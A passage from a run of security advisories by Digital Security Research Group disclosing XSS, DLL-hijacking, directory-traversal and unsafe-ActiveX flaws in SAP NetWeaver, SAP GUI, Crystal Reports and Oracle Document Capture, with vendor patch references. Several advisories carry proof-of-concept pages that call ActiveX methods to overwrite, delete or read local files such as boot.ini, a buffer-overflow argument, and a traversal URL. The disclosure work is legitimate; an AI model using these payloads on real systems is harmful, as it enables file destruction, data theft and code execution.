ERPSCAN security suite for SAP and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS
[DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS SAP NetWeaver Integration Directory has multiple linked XSS vulnerabilities. Digital Security Research Group [DSecRG] Advisory DSecRG-11-012 ( Internal DSecRG-00159) Application: SAP NetWeaver XI Versions Affected: SAP NetWeaver XI Vendor URL: http://www.sap.com Bugs:XSS Exploits:YES Reported:09.06.2010 Vendor response: 10.06.2010 Date of Public Advisory:09.03.2011 CVE-number: Author: Dmitriy Evdokimov from Digital Security Research Group [DSecRG] (research [at] dsec rg[dot] com) Description *** SAP NetWeaver Integration Directory has multiple linked XSS vulnerabilities. Details *** 1. Vulnerable servlet: CheckService Vulnerable parameters: fileNameL, directoryNameL 2. Vulnerable servlet: ExportabilityCheck Vulnerable parameters: fileNameL, directoryNameL 3. Vulnerable servlet: ViewCaches Vulnerable parameters: XiDynPage_ThreadId 4. Vulnerable servlet: ShowMemLog Vulnerable parameters: thread Example: ** Working exploit will be available in commercial scanner ERPSCAN security scanner for SAP (ERPSCAN.com). References ** http://dsecrg.com/pages/vul/show.php?id=312 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/ 1512776 Fix Information * Solution to this issue is given in the 1512776 security note. About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product ERPSCAN security suite for SAP and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-014] SAP GUI (sapgui) - DLL hijacking
[DSECRG-11-014] SAP GUI (sapgui) - DLL hijacking SAP Front End applications (SAPGui.exe) are vulnerable to DLL hijacking attacks. It makes possible to remote code execution Digital Security Research Group [DSecRG] Advisory DSecRG-11-014 (Internal DSecRG-00183) Application: SAP GUI Versions Affected: 6.4 - 7.2 Vendor URL: http://www.sap.com Bugs:DLL hijacking Exploits:YES Reported:24.08.2010 Vendor response: 26.08.2010 Date of Public Advisory:09.03.2011 CVE-number: Author: Alexey Sintsov, Alexandr Polyakov Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** SAP Front End applications (SAPGui.exe) are vulnerable to DLL hijacking attacks. It makes possible to remote code execution. Details *** Attacker can place shortcuts for SAP GUI (.sap) on his share directory. In the same directory he place DLL's with evil code. Name of DLL will be MFC80RUS.DLL(for Russian systems) or MFC80LOC.DLL for SAPGui.exe. Than attacker get link to shortcut to a victim. When victim try to open shortcuts, SAP application try to load it DLL's from working dir that is attacker share directory. So attacker's DLL's will be loaded by victim and evil code from this libraries will be executed. It is because SAPGui.exe and BExAnalyzer.exe try to find the directory in work path before system directories. References ** http://dsecrg.com/pages/vul/show.php?id=314 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1511179 Fix Information * Solution to this issue is given in the 1511179 security note. About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product ERPSCAN security suite for SAP and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS
[DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS SAP Crystal Report Server 2008 - multiple cross-site scripting vulnerabilities. SAP Crystal Report Server 2008 - Multiple cross-site scripting vulnerabilities. [DSecRG-11-011] (Internal DSECRG-00147) Multiple XSS vulnerabilities found in the module PerformanceManagement application SAP Crystal Report Server 2008. An attacker can intercept the cookie administrator or regular user of the system. Application: SAP Crystal Report Server 2008 Versions Affected: SAP Crystal Report Server 2008 Vendor URL: http://www.sap.com Bugs: Linked XSS Vulnerability Exploits:YES Reported: 06.08.2010 Vendor response: 07.08.2010 Date of Public Advisory: 09.03.2011 Authors: Dmitriy Chastuhin Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Details *** Using the discovered vulnerabilities, an attacker can intercept the cookie and perform any administrative actions in the system on its behalf. 1. cross-site scripting vulnerability found in script aa-add-analytic2.jsp Vulnerable GET parameter backURL 2 cross-site scripting vulnerability found in script aa-add-validate.jsp Vulnerable GET parameter pagePos 3 cross-site scripting vulnerability found in script aa-analytic-frameset.jsp.jsp Vulnerable GET parameter entry 4 cross-site scripting vulnerability found in script aa-cacheparams.jsp Vulnerable GET parameters MetaDataCachePeriod, AppBuilderCachePeriod, SessionCachePeriod, RefreshDashboardPeriod 5 cross-site scripting vulnerability found in script aa-display-flash.jsp Vulnerable GET parameter swf 6 cross-site scripting vulnerability found in script aa-dmgraph.jsp Vulnerable GET parameter Sel 7 cross-site scripting vulnerability found in script aa-edit-goal.jsp Vulnerable GET parameter defTar 8 cross-site scripting vulnerability found in script aa-map-frameset.jsp Vulnerable GET parameter analyticToken 9 cross-site scripting vulnerability found in script aa-open-inlist.jsp Vulnerable GET parameters url, sWindow, BEGIN_DATE, END_DATE, CURRENT_DATE, CURRENT_SLICE 10 cross-site scripting vulnerability found in script aa-overviewctxt.jsp Vulnerable GET parameters DocName, Label Example: ** Working exploit will be available in commercial scanner ERPSCAN security scanner for SAP (ERPSCAN.com). References ** http://dsecrg.com/pages/vul/show.php?id=311 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1509610 Fix Information * Solution to this issue is given in the 1509610 security note. About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product ERPSCAN security suite for SAP and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-009] SAP NetWaver XI SOAP Adapter - XSS
[DSECRG-11-009] SAP NetWaver XI SOAP Adapter - XSS SAP NetWeaver 7.0 application XI SOAP Adapter has linked XSS vulnerability Digital Security Research Group [DSecRG] Advisory DSecRG-11-009 (Internal DSecRG-00120) Application: SAP NetWeaver Versions Affected: SAP NetWeaver XI SOAP Adapter 3.0-7.11 Vendor URL: http://www.sap.com Bugs:XSS Exploits:YES Reported:25.01.2010 Vendor response: 25.01.2010 Date of Public Advisory:09.03.2011 CVE-number: Author: Dmitriy Evdokimov from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** SAP Netweaver 70 application XI SOAP Adapter (com.sap.aii.af.soapadapter) has linked XSS vulnerability. Details *** Vulnerable script: HelperServlet Vulnerable parameters: action Example: ** Working exploit will be available in commercial scanner ERPSCAN security scanner for SAP (ERPSCAN.com). References ** http://dsecrg.com/pages/vul/show.php?id=309 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1438191 Fix Information * Solution to this issue is given in the 1438191 security note. About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product ERPSCAN security suite for SAP and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-010] SAP NetWeaver logon.html - XSS
[DSECRG-11-010] SAP NetWeaver logon.html - XSS SAP NetWeaver BSP logon page has linked XSS vulnerability. Digital Security Research Group [DSecRG] Advisory DSecRG-11-010 (Internal DSecRG-00127) Application: SAP NetWeaver Versions Affected: SAP NetWeaver SAP_BASIS 620-730 Vendor URL: http://www.sap.com Bugs:XSS Exploits:YES Reported:05.02.2010 Vendor response: 06.02.2010 Date of Public Advisory:09.03.2011 CVE-number: Author: Alexey Sintsov Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** SAP NetWeaver BSP logon page has linked XSS vulnerability. Details *** There were found another one vulnerability like described in note 887168 and note 887164 but this vulnerability is on another parameter. Vulnerable variable: logonUrl Vulnerable page: /sap/bc/public/bsp/sap/system_public/logon.htm Attacker can send link to administrator and get his cookie. Example: ** Working exploit will be available in commercial scanner ERPSCAN security scanner for SAP (ERPSCAN.com) References ** http://dsecrg.com/pages/vul/show.php?id=310 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1450270 Fix Information * Solution to this issue is given in the 1450270 security note. About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product ERPSCAN security suite for SAP and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-00153] Oracle Document Capture Actbar2.ocx - insecure method
ActiveX components contain insecure methods. Digital Security Research Group [DSecRG] Advisory #DSECRG-00153 Application:Oracle Document Capture Versions Affected: Release 10gR3 Vendor URL: www.oracle.com Bugs: insecure method, File overwriting Exploits: YES Reported: 22.03.2010 Vendor response:31.03.2010 Date of Public Advisory:24.01.2011 CVE-number: CVE-2010-3591 Author: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** Oracle Document Capture contains ActiveX components that contains insecure methods. Insecure method in Actbar2.ocx Details *** Oracle Document Capture contains ActiveX component ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9} which is contains insecure method SaveLayoutChanges that can overwrite any unhidden file in system. Class ActiveBar2 GUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9} Number of Interfaces: 1 Default Interface: IActiveBar2 RegKey Safe for Script: True RegKey Safe for Init: True KillBitSet: False Exploit *** Attacker can construct html page which call vulnerable function SaveLayoutChanges from ActiveX component Actbar2.ocx Example: HTML HEAD TITLEDSecRG/TITLE /HEAD BODY OBJECT id='eds' classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'/OBJECT SCRIPT function Exploit(){ eds.SaveLayoutChanges(C:\\31337.txt,1); } Exploit(); /SCRIPT /BODY /HTML References ** http://dsecrg.com/pages/vul/show.php?id=304 http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html Fix Information * Information was published in CPU Jan 2011. All customers can download CPU patches following instructions from: http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product ERPSCAN security suite for SAP NetWeaver and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-006] Oracle Document Capture ActiveX - Insecure method, buffer overflow
ActiveX components contain insecure methods. Digital Security Research Group [DSecRG] Advisory DSECRG-11-006 (internal #DSECRG-09-066) Application:Oracle Document Capture Versions Affected: Oracle Document Capture 10.1.3.5 Vendor URL: http://oracle.com Bugs: Insecure method. Buffer overflow. Exploits: YES Reported: 14.12.2009 Vendor response:15.12.2009 Date of Public Advisory:24.01.2011 CVE:CVE-2010-3599 Author: Alexandr Polyakov from DSecRG Description *** Insecure method was founded in NCSECWLib ActiveX control component which is a part of Oracle Document Capture . One of the methods (WriteJPG) can be used to overwrite files on users system and also affected to buffer overflow. Details *** Attacker can construct html page which call vulnerable function WriteJPG from ActiveX Object NCSECWLib. Example 1 (file overwrite) *** html script targetFile = C:\Program Files\Oracle\Document Capture\NCSEcw.dll prototype = Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean ) memberName = WriteJPG progid = NCSECWLib.NCSRenderer argCount = 3 arg1=c:\boot.ini arg2=1 arg3=True target.WriteJPG arg1 ,arg2 ,arg3 /script /html Example 2 *** html script targetFile = C:\Program Files\Oracle\Document Capture\NCSEcw.dll prototype = Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean ) memberName = WriteJPG progid = NCSECWLib.NCSRenderer argCount = 3 arg1=String(13332, A) arg2=1 arg3=True target.WriteJPG arg1 ,arg2 ,arg3 /script/job/package References ** http://dsecrg.com/pages/vul/show.php?id=306 http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html Fix Information * Information was published in CPU Jan 2011. All customers can download CPU patches following instructions from: http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product ERPSCAN security suite for SAP NetWeaver and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-007] Oracle Document Capture ImportBodyText - read files
Digital Security Research Group [DSecRG] Advisory DSECRG-11-007 (Internal #DSECRG-00117) Application:Oracle Document Capture Versions Affected: 10.1350.0005 Vendor URL: http://www.oracle.com/technology/software/products/content-management/index_dc.html Bugs: Insecure READ method Exploits: YES Reported: 29.01.2010 Second report: 02.02.2010 Date of Public Advisory:24.01.2010 CVE:CVE-2010-3595 Authors:Alexey Sintsov by Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** EasyMail ActiveX Control (emsmtp.dll) that included into Oracle Document Capture distrib can be used to read any file in target system. Vulnerable method is ImportBodyText(). Details *** For example if you enter filename C:\\boot.ini in ImportBodyText method then control will open and read file C:\boot.ini. Content of boot.ini will be loaded into property BodyText . Class EasyMailSMTPObj GUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9} Number of Interfaces: 1 Default Interface: IEasyMailSMTPObj RegKey Safe for Script: True RegKey Safe for Init: True KillBitSet: False Example: *** HTML HEAD TITLEDSECRG/TITLE /HEAD BODY OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'/OBJECT SCRIPT function Exploit(){ ora.ImportBodyText(C:\\boot.ini); document.write(Try to read c:\\boot.ini:brbr+ora.BodyText); } Exploit(); /SCRIPT /BODY /HTML References ** http://dsecrg.com/pages/vul/show.php?id=307 http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html Fix Information * Information was published in CPU Jan 2011. All customers can download CPU patches following instructions from: http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product ERPSCAN security suite for SAP NetWeaver and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-00143] SAP Crystal Reports 2008 - ActiveX insecure methods
[DSECRG-11-002] (Internal DSECRG-00143) SAP Crystal Report Server 2008 scriptinghelpers.dll ActiveX component - Insecure methods The component contains insecure methods by which you can overwrite any file in the OS, run the executable file, kill process, delete the file. Application:SAP Crystal Report Server 2008 Versions Affected: SAP Crystal Report Server 2008 Vendor URL: http://sap.com Bugs: insecure methods Exploits: YES Reported: 09.03.2010 Vendor response:10.03.2010 Date of SAPNOTE Published: 8.10.2010 Date of Public Advisory: 14.01.2011 Authors:Dmitry Chastuhin Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description SAP Crystal Report Server 2008 contains a variety of features with which users can manage and share interactive reports and dashboards, as well as provide access to them via the Internet. Details ** Insecure practices found in the library scriptinghelpers.dll. An attacker could construct a html-page containing a call Insecure functions. 1 Insecure method CreateTextFile. Perhaps as the creation and overwrite existing files. Sample ** 2 Insecure method LaunchProgram. Possible to run an executable file. 3 Insecure Method DeleteFile. Possible removal of any file in the OS. 4 Insecure method Kill. Perhaps the completion of any process, if we know the pid References ** http://dsecrg.com/pages/vul/show.php?id=302 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1458309 Fix Information * Solution to this issue is given in the 1458309 security note. About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product ERPSCAN security suite for SAP NetWeaver and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-005] Oracle Document Capture empop3.dll - insecure method
ActiveX components contain insecure methods. Digital Security Research Group [DSecRG] Advisory DSECRG-11-005 (internal #DSECRG-00154) Application:Oracle Document Capture Versions Affected: Release 10gR3 Vendor URL: www.oracle.com Bugs: insecure method, File overwriting, File deleting Exploits: YES Reported: 22.03.2010 Vendor response:31.03.2010 Date of Public Advisory:24.01.2011 CVE-number: CVE-2010-3591 Author: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** Oracle Document Capture contains ActiveX components that contains insecure methods in empop3.dll Details *** Oracle Document Capture contains ActiveX component EMPOP3Lib (empop3.dll) Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24} which is contains insecure method DownloadSingleMessageToFile that can delete any file in system. Class EasyMailPop3 GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24} Number of Interfaces: 1 Default Interface: IPOP3Main RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False Details *** Attacker can construct html page which call vulnerable function DownloadSingleMessageToFile from ActiveX component empop3.dll Example: HTML HEAD TITLEDSecRG/TITLE /HEAD BODY OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'/OBJECT SCRIPT function Exploit(){ eds.DownloadSingleMessageToFile(1,C:\\boot.ini,1); } Exploit(); /SCRIPT /BODY /HTML References ** http://dsecrg.com/pages/vul/show.php?id=305 http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html Fix Information * Information was published in CPU Jan 2011. All customers can download CPU patches following instructions from: http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product ERPSCAN security suite for SAP NetWeaver and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-00145] SAP Crystal Reports 2008 - Directory Traversal
ÇDSECRG-11-003 (Internal DSECRG-00145) SAP Crystal Report Server 2008 - Directory Traversal Directory traversal vulnerability discovered in the module PerformanceManagement application SAP Crystal Report Server 2008, which allows you to read any file on the OS. Application:SAP Crystal Report Server 2008 Versions Affected: SAP Crystal Report Server 2008 Vendor URL: http://sap.com Bugs: Directory Traversal File Read Exploits:YES Reported: 29.03.2010 Vendor response:30.03.2010 Date of SAPNOTE Published:8.10.2010 Date of Public Advisory:14.01.2011 Authors:Dmitriy Chastuhin Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com) Description SAP Crystal Report Server 2008 contains a variety of features with which users can manage and share interactive reports and dashboards, as well as provide access to them via the Internet. Details *** Directory Traversal vulnerability was found in script qa.jsp With this vulnerability, an authenticated attacker can read any file on the server. Sample ** http://sap_server_adr:8080/PerformanceManagement/jsp/qa.jsp?func=browseroot=wipath=../../../../../../boot.ini References ** http://dsecrg.com/pages/vul/show.php?id=303 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1476930 Fix Information * Solution to this issue is given in the 1476930 security note. About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product ERPSCAN security suite for SAP NetWeaver and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com 